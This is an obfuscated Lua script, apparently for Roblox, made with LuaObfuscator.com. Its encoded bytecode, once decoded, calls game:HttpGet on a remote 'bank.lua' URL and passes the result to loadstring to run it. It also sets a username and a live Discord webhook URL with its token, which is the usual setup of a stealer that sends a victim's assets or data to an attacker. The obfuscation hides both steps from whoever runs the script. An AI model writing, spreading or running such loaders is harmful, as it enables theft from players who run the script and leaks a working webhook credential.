--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.12) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v82=0 -0 ;local v83;while true do if (v82==0) then v83=(v31/((5 -3)^(v32-(1 -0))))%((4 -2)^(((v33-(1 + 0)) -(v32-(620 -(555 + 64)))) + 1)) ;return v83-(v83%(932 -(857 + 74))) ;end end else local v84=568 -((523 -156) + 201) ;local v85;while true do if (v84==((1992 -(68 + 997)) -(214 + 713))) then v85=2^(v32-(1 + (1637 -(1523 + 114)))) ;return (((v31%(v85 + v85))>=v85) and (1 + 0)) or (877 -(282 + 595)) ;end end end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + (12 -9) );v19=v19 + (121 -(32 + (1042 -(892 + 65)))) ;return (v37 * (16441815 + 335401)) + (v36 * 65536) + (v35 * (57 + 199)) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0 + 0 ;local v39;local v40;local v41;local v42;local v43;local v44;local v45;local v46;while true do if (v38==1) then v41=nil;v42=nil;v38=2;end if ((396 -(115 + 281))~=v38) then else v39=0 -0 ;v40=nil;v38=1 + 0 ;end if (v38==3) then v45=nil;v46=nil;v38=9 -5 ;end if (v38==(14 -10)) then while true do if (v39==2) then v44=nil;v45=nil;v39=870 -(550 + 317) ;end if (v39==(0 -0)) then local v97=0 -0 ;while true do if ((0 -0)==v97) then v40=285 -(134 + 151) ;v41=nil;v97=1666 -(970 + 695) ;end if (v97==1) then v39=1;break;end end end if (v39~=(1 -0)) then else local v98=1990 -(582 + 1408) ;local v99;while true do if (v98~=(0 -0)) then else v99=0;while true do if (v99==1) then v39=2;break;end if (v99~=(0 -0)) then else local v110=0;while true do if (v110~=(0 -0)) then else v42=nil;v43=nil;v110=1825 -(1195 + 629) ;end if (v110==1) then v99=1;break;end end end end break;end end end if (v39~=3) then else v46=nil;while true do local v100=0 -0 ;while true do if (v100==0) then local v102=0;local v103;while true do if (v102==(241 -(187 + 54))) then v103=0;while true do if (v103==1) then v100=781 -(162 + 618) ;break;end if (v103~=0) then else local v151=0 + 0 ;while true do if ((1 + 0)~=v151) then else v103=1 -0 ;break;end if (v151==0) then if (v40==1) then local v160=0;local v161;local v162;while true do if (v160==(1 -0)) then while true do if (v161~=0) then else v162=0;while true do if (v162~=1) then else v46={};v40=2;break;end if (v162==0) then local v175=0;while true do if (v175~=1) then else v162=1 + 0 ;break;end if (v175~=0) then else v44={v41,v42,nil,v43};v45=v24();v175=1 -0 ;end end end end break;end end break;end if (v160==(1384 -(746 + 638))) then v161=0 + 0 ;v162=nil;v160=1 -0 ;end end end if (v40==(344 -(218 + 123))) then local v163=0;local v164;while true do if ((1581 -(1535 + 46))==v163) then v164=0;while true do if (v164~=0) then else local v172=0;while true do if (0==v172) then for v182=1,v24() do v42[v182-(1 + 0) ]=v29();end return v44;end end end end break;end end end v151=1;end end end end break;end end end if (v100==(1 + 0)) then if (v40~=2) then else local v111=0;local v112;while true do if (v111==(560 -(306 + 254))) then v112=0 + 0 ;while true do if (v112==(0 -0)) then local v154=1467 -(899 + 568) ;while true do if (v154==1) then v112=1;break;end if ((0 + 0)~=v154) then else for v166=1,v45 do local v167=0;local v168;local v169;local v170;while true do if (v167==(2 -1)) then v170=nil;while true do if (v168==(604 -(268 + 335))) then if (v169==1) then v170=v22()~=(290 -(60 + 230)) ;elseif (v169==2) then v170=v25();elseif (v169~=3) then else v170=v26();end v46[v166]=v170;break;end if (v168==(572 -(426 + 146))) then local v174=0;while true do if (v174==(0 + 0)) then v169=v22();v170=nil;v174=1457 -(282 + 1174) ;end if (v174~=(812 -(569 + 242))) then else v168=1;break;end end end end break;end if (v167==(0 -0)) then v168=0;v169=nil;v167=1 + 0 ;end end end v44[1027 -(706 + 318) ]=v22();v154=1252 -(721 + 530) ;end end end if (v112==1) then for v155=1272 -(945 + 326) ,v24() do local v156=0;local v157;local v158;local v159;while true do if ((2 -1)~=v156) then else v159=nil;while true do if ((0 + 0)~=v157) then else local v171=700 -(271 + 429) ;while true do if (v171==(0 + 0)) then v158=1500 -(1408 + 92) ;v159=nil;v171=1;end if ((1087 -(461 + 625))~=v171) then else v157=1;break;end end end if ((1289 -(993 + 295))~=v157) then else while true do if ((0 + 0)~=v158) then else v159=v22();if (v21(v159,1,1)~=(1171 -(418 + 753))) then else local v176=0;local v177;local v178;local v179;local v180;local v181;while true do if (v176~=(0 + 0)) then else v177=0;v178=nil;v176=1;end if (v176~=(1 + 1)) then else v181=nil;while true do if ((0 + 0)==v177) then v178=0;v179=nil;v177=1 + 0 ;end if (v177==1) then local v184=529 -(406 + 123) ;while true do if (0==v184) then v180=nil;v181=nil;v184=1;end if (v184==1) then v177=1771 -(1749 + 20) ;break;end end end if (v177~=2) then else while true do if (v178~=(1 + 0)) then else local v185=0;local v186;while true do if (0==v185) then v186=0;while true do if (v186==(1322 -(1249 + 73))) then local v194=0;local v195;while true do if (v194==0) then v195=0 + 0 ;while true do if (v195~=1) then else v186=1146 -(466 + 679) ;break;end if (0~=v195) then else local v203=0;while true do if (v203==0) then v181={v23(),v23(),nil,nil};if (v179==0) then local v204=0 + 0 ;local v205;while true do if (v204==(0 + 0)) then v205=0 -0 ;while true do if (v205~=0) then else v181[3]=v23();v181[4]=v23();break;end end break;end end elseif (v179==1) then v181[3]=v24();elseif (v179==2) then v181[3]=v24() -((5 -3)^16) ;elseif (v179~=(117 -(4 + 110))) then else local v210=0;local v211;while true do if (v210~=0) then else v211=0;while true do if (v211~=0) then else v181[587 -(57 + 527) ]=v24() -((1429 -(41 + 1386))^16) ;v181[107 -(17 + 86) ]=v23();break;end end break;end end end v203=1;end if (v203==1) then v195=1;break;end end end end break;end end end if (v186==1) then v178=2 + 0 ;break;end end break;end end end if (v178==0) then local v187=0 -0 ;local v188;while true do if (v187==(0 -0)) then v188=0;while true do if (v188==(166 -(122 + 44))) then local v196=0 -0 ;while true do if (v196~=0) then else local v198=0 -0 ;while true do if (v198~=0) then else v179=v21(v159,2 + 0 ,3);v180=v21(v159,1 + 3 ,6);v198=1 -0 ;end if (v198==1) then v196=1;break;end end end if (v196==(66 -(30 + 35))) then v188=1;break;end end end if (v188~=1) then else v178=1 + 0 ;break;end end break;end end end if (v178~=(1260 -(1043 + 214))) then else if (v21(v180,3,3)~=(3 -2)) then else v181[1216 -(323 + 889) ]=v46[v181[10 -6 ]];end v41[v155]=v181;break;end if (v178~=(582 -(361 + 219))) then else local v190=0;local v191;while true do if (v190==(320 -(53 + 267))) then v191=0;while true do if ((1 + 0)==v191) then v178=416 -(15 + 398) ;break;end if (v191==0) then local v197=0;while true do if (v197==(983 -(18 + 964))) then v191=3 -2 ;break;end if (v197~=(0 + 0)) then else if (v21(v180,1,1)~=1) then else v181[2 + 0 ]=v46[v181[852 -(20 + 830) ]];end if (v21(v180,2 + 0 ,128 -(116 + 10) )~=1) then else v181[3]=v46[v181[1 + 2 ]];end v197=739 -(542 + 196) ;end end end end break;end end end end break;end end break;end if (v176~=1) then else v179=nil;v180=nil;v176=2;end end end break;end end break;end end break;end if ((0 -0)~=v156) then else v157=0;v158=nil;v156=1 + 0 ;end end end v40=3;break;end end break;end end end if (v40~=(0 + 0)) then else local v113=0 + 0 ;local v114;while true do if (v113==0) then v114=0;while true do if (v114~=0) then else v41={};v42={};v114=1;end if (v114==(2 -1)) then v43={};v40=1;break;end end break;end end end break;end end end break;end end break;end if (v38==2) then v43=nil;v44=nil;v38=7 -4 ;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v47=v24();local v48=v24();local v49=1552 -(1126 + 425) ;local v50=(v21(v48,406 -(118 + 287) ,773 -(239 + 514) ) * ((7 -5)^(1153 -(118 + 1003)))) + v47 ;local v51=v21(v48,61 -40 ,(144 + 264) -(142 + 235) );local v52=((v21(v48,145 -113 )==1) and  -(1 + 0)) or (978 -((1882 -(797 + 532)) + 424)) ;if (v51==((0 + 0) -0)) then if (v50==(0 + 0 + 0)) then return v52 * 0 ;else local v90=0 + 0 ;while true do if (v90==(0 + (0 -0))) then v51=1 + 0 ;v49=(1202 -(373 + 829)) + 0 ;break;end end end elseif (v51==(4437 -2390)) then return ((v50==(0 -0)) and (v52 * ((2 -(732 -(476 + 255)))/(0 + 0)))) or (v52 * NaN) ;end return v8(v52,v51-1023 ) * (v49 + (v50/((9 -7)^(1182 -(369 + 761))))) ;end v26=nil;function v26(v53)local v54;if  not v53 then v53=v24();if (v53==(0 + 0)) then return "";end end v54=v3(v16,v19,(v19 + v53) -1 );v19=v19 + v53 ;local v55={};for v66=1 -0 , #v54 do v55[v66]=v2(v1(v3(v54,v66,v66)));end return v6(v55);end v18=5;end if (v18==2) then function v22()local v56=v1(v16,v19,v19);v19=v19 + 1 ;return v56;end v23=nil;function v23()local v57,v58=v1(v16,v19,v19 + (3 -1) );v19=v19 + 1 + 1 ;return (v58 * 256) + v57 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v59)if (v1(v59,2)==79) then v20=v0(v3(v59,1,1));return "";else local v86=0;local v87;while true do if (v86==0) then v87=v2(v0(v59,16));if v20 then local v101=v5(v87,v20);v20=nil;return v101;else return v87;end break;end end end end);v18=1;end if (v18==7) then function v30(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v68=v63;local v69=v64;local v70=v65;local v71=v28;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v88=0,v76 do if (v88>=v70) then v74[v88-v70 ]=v75[v88 + 1 ];else v78[v88]=v75[v88 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do local v89=0;while true do if (v89==0) then v80=v68[v72];v81=v80[1];v89=1;end if (v89==1) then if (v81<=5) then if (v81<=2) then if (v81<=0) then v78[v80[2]]=v62[v80[3]];elseif (v81==1) then local v115;local v116,v117;local v118;local v119;v78[v80[2]]=v62[v80[3]];v72=v72 + 1 ;v80=v68[v72];v119=v80[2];v118=v78[v80[3]];v78[v119 + 1 ]=v118;v78[v119]=v118[v80[4]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3]~=0 ;v72=v72 + 1 ;v80=v68[v72];v119=v80[2];v116,v117=v71(v78[v119](v13(v78,v119 + 1 ,v80[3])));v73=(v117 + v119) -1 ;v115=0;for v140=v119,v73 do v115=v115 + 1 ;v78[v140]=v116[v115];end v72=v72 + 1 ;v80=v68[v72];v119=v80[2];v78[v119]=v78[v119](v13(v78,v119 + 1 ,v73));v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]();v72=v72 + 1 ;v80=v68[v72];v72=v80[3];else do return;end end elseif (v81<=3) then v72=v80[3];elseif (v81==4) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end else local v129=v80[2];v78[v129]=v78[v129](v13(v78,v129 + 1 ,v73));end elseif (v81<=8) then if (v81<=6) then v78[v80[2]]();elseif (v81==7) then v78[v80[2]]=v80[3]~=0 ;else local v132=v80[2];local v133,v134=v71(v78[v132](v13(v78,v132 + 1 ,v80[3])));v73=(v134 + v132) -1 ;local v135=0;for v143=v132,v73 do local v144=0;while true do if (v144==0) then v135=v135 + 1 ;v78[v143]=v133[v135];break;end end end end elseif (v81<=9) then local v107=0;local v108;local v109;while true do if (v107==0) then v108=v80[2];v109=v78[v80[3]];v107=1;end if (1==v107) then v78[v108 + 1 ]=v109;v78[v108]=v109[v80[4]];break;end end elseif (v81>10) then v78[v80[2]]=v80[3];else v62[v80[3]]=v78[v80[2]];end v72=v72 + 1 ;break;end end end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574031B3O00682O7470733A2O2F672O6F662E70726F2F732F62616E6B2E6C756103083O00557365724E616D65030A3O006A6F6A6F654O313203073O00576562482O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31322O3730383934313438393534393437332F543855315F44315370724F4B45386F304A386150635674505F43595778724C574F67462D774971754C426E6B304B696D36322D33794C4B723758505A494C51532O4E7161001D3O00120B3O00013O0026043O000C000100020004033O000C000100122O000100033O001201000200043O00202O00020002000500122O000400066O000500016O000200056O00013O00024O00010001000100044O001C00010026043O0001000100010004033O0001000100120B000100013O00260400010016000100010004033O0016000100120B000200083O00120A000200073O00120B0002000A3O00120A000200093O00120B000100023O0026040001000F000100020004033O000F000100120B3O00023O0004033O000100010004033O000F00010004033O000100012O00023O00017O00",v9(),...);
